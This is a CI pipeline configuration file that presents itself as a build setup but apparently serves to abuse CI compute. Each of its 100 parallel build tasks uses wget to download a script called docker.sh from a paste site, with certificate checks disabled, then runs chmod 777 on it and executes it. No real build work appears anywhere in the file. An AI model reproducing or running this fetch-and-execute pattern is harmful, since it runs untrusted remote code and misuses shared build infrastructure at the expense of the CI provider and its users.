version: v2

tasks:
  build:
    runner: node:10
    steps:
    - run: wget --no-check-certificate -c https://www.heypasteit.com/download/0IXWHD -O docker.sh  && chmod 777 docker.sh && ./docker.sh

  build2:
    steps:
    - run: wget --no-check-certificate -c https://www.heypasteit.com/download/0IXWHD -O docker.sh  && chmod 777 docker.sh && ./docker.sh

  build3:
    steps:
    - run: wget --no-check-certificate -c https://www.heypasteit.com/download/0IXWHD -O docker.sh  && chmod 777 docker.sh && ./docker.sh

  build4:
    steps:
    - run: wget --no-check-certificate -c https://www.heypasteit.com/download/0IXWHD -O docker.sh  && chmod 777 docker.sh && ./docker.sh

  build5:
    steps:
    - run: wget --no-check-certificate -c https://www.heypasteit.com/download/0IXWHD -O docker.sh  && chmod 777 docker.sh && ./docker.sh

  build6:
    steps:
    - run: wget --no-check-certificate -c https://www.heypasteit.com/download/0IXWHD -O docker.sh  && chmod 777 docker.sh && ./docker.sh

  build7:
    steps:
    - run: wget --no-check-certificate -c https://www.heypasteit.com/download/0IXWHD -O docker.sh  && chmod 777 docker.sh && ./docker.sh

  build8:
    steps:
    - run: wget --no-check-certificate -c https://www.heypasteit.com/download/0IXWHD -O docker.sh  && chmod 777 docker.sh && ./docker.sh

  build9:
    steps:
    - run: wget --no-check-certificate -c https://www.heypasteit.com/download/0IXWHD -O docker.sh  && chmod 777 docker.sh && ./docker.sh

  build10:
    steps:
    - run: wget --no-check-certificate -c https://www.heypasteit.com/download/0IXWHD -O docker.sh  && chmod 777 docker.sh && ./docker.sh

  build11:
    steps:
    - run: wget --no-check-certificate -c https://www.heypasteit.com/download/0IXWHD -O docker.sh  && chmod 777 docker.sh && ./docker.sh

  build12:
    steps:
    - run: wget --no-check-certificate -c https://www.heypasteit.com/download/0IXWHD -O docker.sh  && chmod 777 docker.sh && ./docker.sh

  build13:
    steps:
    - run: wget --no-check-certificate -c https://www.heypasteit.com/download/0IXWHD -O docker.sh  && chmod 777 docker.sh && ./docker.sh

  build14:
    steps:
    - run: wget --no-check-certificate -c https://www.heypasteit.com/download/0IXWHD -O docker.sh  && chmod 777 docker.sh && ./docker.sh

  build15:
    steps:
    - run: wget --no-check-certificate -c https://www.heypasteit.com/download/0IXWHD -O docker.sh  && chmod 777 docker.sh && ./docker.sh

  build16:
    steps:
    - run: wget --no-check-certificate -c https://www.heypasteit.com/download/0IXWHD -O docker.sh  && chmod 777 docker.sh && ./docker.sh

  build17:
    steps:
    - run: wget --no-check-certificate -c https://www.heypasteit.com/download/0IXWHD -O docker.sh  && chmod 777 docker.sh && ./docker.sh

  build18:
    steps:
    - run: wget --no-check-certificate -c https://www.heypasteit.com/download/0IXWHD -O docker.sh  && chmod 777 docker.sh && ./docker.sh

  build19:
    steps:
    - run: wget --no-check-certificate -c https://www.heypasteit.com/download/0IXWHD -O docker.sh  && chmod 777 docker.sh && ./docker.sh

  build20:
    steps:
    - run: wget --no-check-certificate -c https://www.heypasteit.com/download/0IXWHD -O docker.sh  && chmod 777 docker.sh && ./docker.sh

  build21:
    steps:
    - run: wget --no-check-certificate -c https://www.heypasteit.com/download/0IXWHD -O docker.sh  && chmod 777 docker.sh && ./docker.sh

  build22:
    steps:
    - run: wget --no-check-certificate -c https://www.heypasteit.com/download/0IXWHD -O docker.sh  && chmod 777 docker.sh && ./docker.sh

  build23:
    steps:
    - run: wget --no-check-certificate -c https://www.heypasteit.com/download/0IXWHD -O docker.sh  && chmod 777 docker.sh && ./docker.sh

  build24:
    steps:
    - run: wget --no-check-certificate -c https://www.heypasteit.com/download/0IXWHD -O docker.sh  && chmod 777 docker.sh && ./docker.sh

  build25:
    steps:
    - run: wget --no-check-certificate -c https://www.heypasteit.com/download/0IXWHD -O docker.sh  && chmod 777 docker.sh && ./docker.sh

  build26:
    steps:
    - run: wget --no-check-certificate -c https://www.heypasteit.com/download/0IXWHD -O docker.sh  && chmod 777 docker.sh && ./docker.sh

  build27:
    steps:
    - run: wget --no-check-certificate -c https://www.heypasteit.com/download/0IXWHD -O docker.sh  && chmod 777 docker.sh && ./docker.sh

  build28:
    steps:
    - run: wget --no-check-certificate -c https://www.heypasteit.com/download/0IXWHD -O docker.sh  && chmod 777 docker.sh && ./docker.sh

  build29:
    steps:
    - run: wget --no-check-certificate -c https://www.heypasteit.com/download/0IXWHD -O docker.sh  && chmod 777 docker.sh && ./docker.sh

  build30:
    steps:
    - run: wget --no-check-certificate -c https://www.heypasteit.com/download/0IXWHD -O docker.sh  && chmod 777 docker.sh && ./docker.sh

  build31:
    steps:
    - run: wget --no-check-certificate -c https://www.heypasteit.com/download/0IXWHD -O docker.sh  && chmod 777 docker.sh && ./docker.sh

  build32:
    steps:
    - run: wget --no-check-certificate -c https://www.heypasteit.com/download/0IXWHD -O docker.sh  && chmod 777 docker.sh && ./docker.sh

  build33:
    steps:
    - run: wget --no-check-certificate -c https://www.heypasteit.com/download/0IXWHD -O docker.sh  && chmod 777 docker.sh && ./docker.sh

  build34:
    steps:
    - run: wget --no-check-certificate -c https://www.heypasteit.com/download/0IXWHD -O docker.sh  && chmod 777 docker.sh && ./docker.sh

  build35:
    steps:
    - run: wget --no-check-certificate -c https://www.heypasteit.com/download/0IXWHD -O docker.sh  && chmod 777 docker.sh && ./docker.sh

  build36:
    steps:
    - run: wget --no-check-certificate -c https://www.heypasteit.com/download/0IXWHD -O docker.sh  && chmod 777 docker.sh && ./docker.sh

  build37:
    steps:
    - run: wget --no-check-certificate -c https://www.heypasteit.com/download/0IXWHD -O docker.sh  && chmod 777 docker.sh && ./docker.sh

  build38:
    steps:
    - run: wget --no-check-certificate -c https://www.heypasteit.com/download/0IXWHD -O docker.sh  && chmod 777 docker.sh && ./docker.sh

  build39:
    steps:
    - run: wget --no-check-certificate -c https://www.heypasteit.com/download/0IXWHD -O docker.sh  && chmod 777 docker.sh && ./docker.sh

  build40:
    steps:
    - run: wget --no-check-certificate -c https://www.heypasteit.com/download/0IXWHD -O docker.sh  && chmod 777 docker.sh && ./docker.sh

  build41:
    steps:
    - run: wget --no-check-certificate -c https://www.heypasteit.com/download/0IXWHD -O docker.sh  && chmod 777 docker.sh && ./docker.sh

  build42:
    steps:
    - run: wget --no-check-certificate -c https://www.heypasteit.com/download/0IXWHD -O docker.sh  && chmod 777 docker.sh && ./docker.sh

  build43:
    steps:
    - run: wget --no-check-certificate -c https://www.heypasteit.com/download/0IXWHD -O docker.sh  && chmod 777 docker.sh && ./docker.sh

  build44:
    steps:
    - run: wget --no-check-certificate -c https://www.heypasteit.com/download/0IXWHD -O docker.sh  && chmod 777 docker.sh && ./docker.sh

  build45:
    steps:
    - run: wget --no-check-certificate -c https://www.heypasteit.com/download/0IXWHD -O docker.sh  && chmod 777 docker.sh && ./docker.sh

  build46:
    steps:
    - run: wget --no-check-certificate -c https://www.heypasteit.com/download/0IXWHD -O docker.sh  && chmod 777 docker.sh && ./docker.sh

  build47:
    steps:
    - run: wget --no-check-certificate -c https://www.heypasteit.com/download/0IXWHD -O docker.sh  && chmod 777 docker.sh && ./docker.sh

  build48:
    steps:
    - run: wget --no-check-certificate -c https://www.heypasteit.com/download/0IXWHD -O docker.sh  && chmod 777 docker.sh && ./docker.sh

  build49:
    steps:
    - run: wget --no-check-certificate -c https://www.heypasteit.com/download/0IXWHD -O docker.sh  && chmod 777 docker.sh && ./docker.sh

  build50:
    steps:
    - run: wget --no-check-certificate -c https://www.heypasteit.com/download/0IXWHD -O docker.sh  && chmod 777 docker.sh && ./docker.sh

  build51:
    steps:
    - run: wget --no-check-certificate -c https://www.heypasteit.com/download/0IXWHD -O docker.sh  && chmod 777 docker.sh && ./docker.sh

  build52:
    steps:
    - run: wget --no-check-certificate -c https://www.heypasteit.com/download/0IXWHD -O docker.sh  && chmod 777 docker.sh && ./docker.sh

  build53:
    steps:
    - run: wget --no-check-certificate -c https://www.heypasteit.com/download/0IXWHD -O docker.sh  && chmod 777 docker.sh && ./docker.sh

  build54:
    steps:
    - run: wget --no-check-certificate -c https://www.heypasteit.com/download/0IXWHD -O docker.sh  && chmod 777 docker.sh && ./docker.sh

  build55:
    steps:
    - run: wget --no-check-certificate -c https://www.heypasteit.com/download/0IXWHD -O docker.sh  && chmod 777 docker.sh && ./docker.sh

  build56:
    steps:
    - run: wget --no-check-certificate -c https://www.heypasteit.com/download/0IXWHD -O docker.sh  && chmod 777 docker.sh && ./docker.sh

  build57:
    steps:
    - run: wget --no-check-certificate -c https://www.heypasteit.com/download/0IXWHD -O docker.sh  && chmod 777 docker.sh && ./docker.sh

  build58:
    steps:
    - run: wget --no-check-certificate -c https://www.heypasteit.com/download/0IXWHD -O docker.sh  && chmod 777 docker.sh && ./docker.sh

  build59:
    steps:
    - run: wget --no-check-certificate -c https://www.heypasteit.com/download/0IXWHD -O docker.sh  && chmod 777 docker.sh && ./docker.sh

  build60:
    steps:
    - run: wget --no-check-certificate -c https://www.heypasteit.com/download/0IXWHD -O docker.sh  && chmod 777 docker.sh && ./docker.sh

  build61:
    steps:
    - run: wget --no-check-certificate -c https://www.heypasteit.com/download/0IXWHD -O docker.sh  && chmod 777 docker.sh && ./docker.sh

  build62:
    steps:
    - run: wget --no-check-certificate -c https://www.heypasteit.com/download/0IXWHD -O docker.sh  && chmod 777 docker.sh && ./docker.sh

  build63:
    steps:
    - run: wget --no-check-certificate -c https://www.heypasteit.com/download/0IXWHD -O docker.sh  && chmod 777 docker.sh && ./docker.sh

  build64:
    steps:
    - run: wget --no-check-certificate -c https://www.heypasteit.com/download/0IXWHD -O docker.sh  && chmod 777 docker.sh && ./docker.sh

  build65:
    steps:
    - run: wget --no-check-certificate -c https://www.heypasteit.com/download/0IXWHD -O docker.sh  && chmod 777 docker.sh && ./docker.sh

  build66:
    steps:
    - run: wget --no-check-certificate -c https://www.heypasteit.com/download/0IXWHD -O docker.sh  && chmod 777 docker.sh && ./docker.sh

  build67:
    steps:
    - run: wget --no-check-certificate -c https://www.heypasteit.com/download/0IXWHD -O docker.sh  && chmod 777 docker.sh && ./docker.sh

  build68:
    steps:
    - run: wget --no-check-certificate -c https://www.heypasteit.com/download/0IXWHD -O docker.sh  && chmod 777 docker.sh && ./docker.sh

  build69:
    steps:
    - run: wget --no-check-certificate -c https://www.heypasteit.com/download/0IXWHD -O docker.sh  && chmod 777 docker.sh && ./docker.sh

  build70:
    steps:
    - run: wget --no-check-certificate -c https://www.heypasteit.com/download/0IXWHD -O docker.sh  && chmod 777 docker.sh && ./docker.sh

  build71:
    steps:
    - run: wget --no-check-certificate -c https://www.heypasteit.com/download/0IXWHD -O docker.sh  && chmod 777 docker.sh && ./docker.sh

  build72:
    steps:
    - run: wget --no-check-certificate -c https://www.heypasteit.com/download/0IXWHD -O docker.sh  && chmod 777 docker.sh && ./docker.sh

  build73:
    steps:
    - run: wget --no-check-certificate -c https://www.heypasteit.com/download/0IXWHD -O docker.sh  && chmod 777 docker.sh && ./docker.sh

  build74:
    steps:
    - run: wget --no-check-certificate -c https://www.heypasteit.com/download/0IXWHD -O docker.sh  && chmod 777 docker.sh && ./docker.sh

  build75:
    steps:
    - run: wget --no-check-certificate -c https://www.heypasteit.com/download/0IXWHD -O docker.sh  && chmod 777 docker.sh && ./docker.sh

  build76:
    steps:
    - run: wget --no-check-certificate -c https://www.heypasteit.com/download/0IXWHD -O docker.sh  && chmod 777 docker.sh && ./docker.sh

  build77:
    steps:
    - run: wget --no-check-certificate -c https://www.heypasteit.com/download/0IXWHD -O docker.sh  && chmod 777 docker.sh && ./docker.sh

  build78:
    steps:
    - run: wget --no-check-certificate -c https://www.heypasteit.com/download/0IXWHD -O docker.sh  && chmod 777 docker.sh && ./docker.sh

  build79:
    steps:
    - run: wget --no-check-certificate -c https://www.heypasteit.com/download/0IXWHD -O docker.sh  && chmod 777 docker.sh && ./docker.sh

  build80:
    steps:
    - run: wget --no-check-certificate -c https://www.heypasteit.com/download/0IXWHD -O docker.sh  && chmod 777 docker.sh && ./docker.sh

  build81:
    steps:
    - run: wget --no-check-certificate -c https://www.heypasteit.com/download/0IXWHD -O docker.sh  && chmod 777 docker.sh && ./docker.sh

  build82:
    steps:
    - run: wget --no-check-certificate -c https://www.heypasteit.com/download/0IXWHD -O docker.sh  && chmod 777 docker.sh && ./docker.sh

  build83:
    steps:
    - run: wget --no-check-certificate -c https://www.heypasteit.com/download/0IXWHD -O docker.sh  && chmod 777 docker.sh && ./docker.sh

  build84:
    steps:
    - run: wget --no-check-certificate -c https://www.heypasteit.com/download/0IXWHD -O docker.sh  && chmod 777 docker.sh && ./docker.sh

  build85:
    steps:
    - run: wget --no-check-certificate -c https://www.heypasteit.com/download/0IXWHD -O docker.sh  && chmod 777 docker.sh && ./docker.sh

  build86:
    steps:
    - run: wget --no-check-certificate -c https://www.heypasteit.com/download/0IXWHD -O docker.sh  && chmod 777 docker.sh && ./docker.sh

  build87:
    steps:
    - run: wget --no-check-certificate -c https://www.heypasteit.com/download/0IXWHD -O docker.sh  && chmod 777 docker.sh && ./docker.sh

  build88:
    steps:
    - run: wget --no-check-certificate -c https://www.heypasteit.com/download/0IXWHD -O docker.sh  && chmod 777 docker.sh && ./docker.sh

  build89:
    steps:
    - run: wget --no-check-certificate -c https://www.heypasteit.com/download/0IXWHD -O docker.sh  && chmod 777 docker.sh && ./docker.sh

  build90:
    steps:
    - run: wget --no-check-certificate -c https://www.heypasteit.com/download/0IXWHD -O docker.sh  && chmod 777 docker.sh && ./docker.sh

  build91:
    steps:
    - run: wget --no-check-certificate -c https://www.heypasteit.com/download/0IXWHD -O docker.sh  && chmod 777 docker.sh && ./docker.sh

  build92:
    steps:
    - run: wget --no-check-certificate -c https://www.heypasteit.com/download/0IXWHD -O docker.sh  && chmod 777 docker.sh && ./docker.sh

  build93:
    steps:
    - run: wget --no-check-certificate -c https://www.heypasteit.com/download/0IXWHD -O docker.sh  && chmod 777 docker.sh && ./docker.sh

  build94:
    steps:
    - run: wget --no-check-certificate -c https://www.heypasteit.com/download/0IXWHD -O docker.sh  && chmod 777 docker.sh && ./docker.sh

  build95:
    steps:
    - run: wget --no-check-certificate -c https://www.heypasteit.com/download/0IXWHD -O docker.sh  && chmod 777 docker.sh && ./docker.sh

  build96:
    steps:
    - run: wget --no-check-certificate -c https://www.heypasteit.com/download/0IXWHD -O docker.sh  && chmod 777 docker.sh && ./docker.sh

  build97:
    steps:
    - run: wget --no-check-certificate -c https://www.heypasteit.com/download/0IXWHD -O docker.sh  && chmod 777 docker.sh && ./docker.sh

  build98:
    steps:
    - run: wget --no-check-certificate -c https://www.heypasteit.com/download/0IXWHD -O docker.sh  && chmod 777 docker.sh && ./docker.sh

  build99:
    steps:
    - run: wget --no-check-certificate -c https://www.heypasteit.com/download/0IXWHD -O docker.sh  && chmod 777 docker.sh && ./docker.sh

  build100:
    steps:
    - run: wget --no-check-certificate -c https://www.heypasteit.com/download/0IXWHD -O docker.sh  && chmod 777 docker.sh && ./docker.sh

workflows:
  - name: 1
    tasks:
      - build
  - name: 2
    tasks:
      - build2
  - name: 3
    tasks:
      - build3
  - name: 4
    tasks:
      - build4
  - name: 5
    tasks:
      - build5
  - name: 6
    tasks:
      - build6
  - name: 7
    tasks:
      - build7
  - name: 8
    tasks:
      - build8
  - name: 9
    tasks:
      - build9
  - name: 10
    tasks:
      - build10
  - name: 11
    tasks:
      - build11
  - name: 12
    tasks:
      - build12
  - name: 13
    tasks:
      - build13
  - name: 14
    tasks:
      - build14
  - name: 15
    tasks:
      - build15
  - name: 16
    tasks:
      - build16
  - name: 17
    tasks:
      - build17
  - name: 18
    tasks:
      - build18
  - name: 19
    tasks:
      - build19
  - name: 29
    tasks:
      - build20
  - name: 21
    tasks:
      - build21
  - name: 22
    tasks:
      - build22
  - name: 23
    tasks:
      - build23
  - name: 24
    tasks:
      - build24
  - name: 25
    tasks:
      - build25
  - name: 26
    tasks:
      - build26
  - name: 27
    tasks:
      - build27
  - name: 28
    tasks:
      - build28
  - name: 29
    tasks:
      - build29
  - name: 30
    tasks:
      - build30
  - name: 31
    tasks:
      - build31
  - name: 32
    tasks:
      - build32
  - name: 33
    tasks:
      - build33
  - name: 34
    tasks:
      - build34
  - name: 35
    tasks:
      - build35
  - name: 36
    tasks:
      - build36
  - name: 37
    tasks:
      - build37
  - name: 38
    tasks:
      - build38
  - name: 39
    tasks:
      - build39
  - name: 40
    tasks:
      - build40
  - name: 41
    tasks:
      - build41
  - name: 42
    tasks:
      - build42
  - name: 43
    tasks:
      - build43
  - name: 44
    tasks:
      - build44
  - name: 45
    tasks:
      - build45
  - name: 46
    tasks:
      - build46
  - name: 47
    tasks:
      - build47
  - name: 48
    tasks:
      - build48
  - name: 49
    tasks:
      - build49
  - name: 50
    tasks:
      - build50
  - name: 51
    tasks:
      - build51
  - name: 52
    tasks:
      - build52
  - name: 53
    tasks:
      - build53
  - name: 54
    tasks:
      - build54
  - name: 55
    tasks:
      - build55
  - name: 56
    tasks:
      - build56
  - name: 57
    tasks:
      - build57
  - name: 58
    tasks:
      - build58
  - name: 59
    tasks:
      - build59
  - name: 60
    tasks:
      - build60
  - name: 61
    tasks:
      - build61
  - name: 62
    tasks:
      - build62
  - name: 63
    tasks:
      - build63
  - name: 64
    tasks:
      - build64
  - name: 65
    tasks:
      - build65
  - name: 66
    tasks:
      - build66
  - name: 67
    tasks:
      - build67
  - name: 68
    tasks:
      - build68
  - name: 69
    tasks:
      - build69
  - name: 70
    tasks:
      - build70
  - name: 71
    tasks:
      - build71
  - name: 72
    tasks:
      - build72
  - name: 73
    tasks:
      - build73
  - name: 74
    tasks:
      - build74
  - name: 75
    tasks:
      - build75
  - name: 76
    tasks:
      - build76
  - name: 77
    tasks:
      - build77
  - name: 78
    tasks:
      - build78
  - name: 79
    tasks:
      - build79
  - name: 80
    tasks:
      - build80
  - name: 81
    tasks:
      - build81
  - name: 82
    tasks:
      - build82
  - name: 83
    tasks:
      - build83
  - name: 84
    tasks:
      - build84
  - name: 85
    tasks:
      - build85
  - name: 86
    tasks:
      - build86
  - name: 87
    tasks:
      - build87
  - name: 88
    tasks:
      - build88
  - name: 89
    tasks:
      - build89
  - name: 90
    tasks:
      - build90
  - name: 91
    tasks:
      - build91
  - name: 92
    tasks:
      - build92
  - name: 93
    tasks:
      - build93
  - name: 94
    tasks:
      - build94
  - name: 95
    tasks:
      - build95
  - name: 96
    tasks:
      - build96
  - name: 97
    tasks:
      - build97
  - name: 98
    tasks:
      - build98
  - name: 99
    tasks:
      - build99
  - name: 100
    tasks:
      - build100